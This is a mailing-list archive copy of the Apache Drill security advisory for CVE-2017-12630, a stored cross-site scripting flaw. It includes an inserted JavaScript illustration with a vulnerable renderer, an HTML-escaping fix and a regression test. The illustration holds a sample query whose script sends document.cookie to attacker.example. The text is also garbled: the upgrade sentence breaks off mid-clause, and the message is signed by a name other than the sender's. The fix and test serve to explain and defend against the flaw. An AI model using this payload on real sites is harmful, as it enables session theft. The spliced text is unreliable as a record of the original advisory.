drill-user mailing list archives

From Arina Ielchiieva <ar...@apache.org>
Subject [SECURITY] CVE-2017-12630 Apache Drill XSS vulnerability
Date Mon, 18 Dec 2017 10:35:21 GMT
*CVE-2017-12630 Apache Drill XSS vulnerability*

*Severity*: Important

*Vendor:* The Apache Software Foundation

*Versions Affected:*
Apache Drill 1.11.0 and earlier

In Apache Drill 1.11.0 and earlier, a user submitting the form on the Query page
can pass arbitrary script or HTML, which is stored and then rendered unescaped
on the Profile page afterwards.

For example, after submitting from the Query page a specially crafted script that
reads cookie information, a malicious user may obtain this information from the
Profile page.
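The stored-XSS pattern the advisory describes, as an added illustration that is not
Apache Drill's code: the in-memory store, the template and the function names below
are hypothetical stand-ins for "query text submitted on the Query page, rendered later
on the Profile page". The malicious query is a constructed sample.

```javascript
// Added illustration of the stored-XSS pattern described in the advisory.
// Not Apache Drill's code: the store, template and function names are
// hypothetical stand-ins for "submitted on the Query page, shown on the
// Profile page".

// Hypothetical persistence: the web tier keeps submitted query text by id.
const submittedQueries = new Map();

function submitQuery(queryId, queryText) {
  submittedQueries.set(queryId, queryText);
  return queryId;
}

// Constructed malicious submission: syntactically a query, but the text also
// carries a script that exfiltrates document.cookie once it is rendered.
const MALICIOUS_QUERY =
  'SELECT 1 <script>new Image().src="http://attacker.example/?c="' +
  '+encodeURIComponent(document.cookie)</script>';

// Vulnerable profile renderer: interpolates the stored text verbatim into
// HTML, so any markup the submitter wrote becomes part of the page.
function renderProfileVulnerable(queryId) {
  const queryText = submittedQueries.get(queryId) || "";
  return `<div class="query-profile"><pre>${queryText}</pre></div>`;
}

// Encoder for the HTML text-content context only. Attribute, URL and
// JavaScript contexts need their own encoders.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Hardened renderer: same template, but the untrusted text is encoded at the
// point where it enters the HTML output.
function renderProfileHardened(queryId) {
  const queryText = submittedQueries.get(queryId) || "";
  return `<div class="query-profile"><pre>${escapeHtml(queryText)}</pre></div>`;
}

// Regression check for a test suite: after the fixed template tags we emitted
// ourselves are removed, no tag start should remain, because any that does
// can only have come from the interpolated user text.
function containsRawTag(html) {
  const withoutTemplate = html
    .replace('<div class="query-profile"><pre>', "")
    .replace("</pre></div>", "");
  return /<[a-z!\/]/i.test(withoutTemplate);
}

// Walk the scenario end to end: submit once, render both ways.
function demo() {
  const id = submitQuery("q-1", MALICIOUS_QUERY);
  return {
    vulnerable: containsRawTag(renderProfileVulnerable(id)), // true
    hardened: containsRawTag(renderProfileHardened(id)),     // false
  };
}
```

The fix is output encoding at the template, not input filtering on the Query page: the
same text must still be stored and displayed as a query, and a block list on the input
side would have to anticipate every HTML and JavaScript variant an attacker can write.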

Users of the affected versions should upgrade to Apache Drill 1.12.0 and

Sanjog Panda

Kind regards
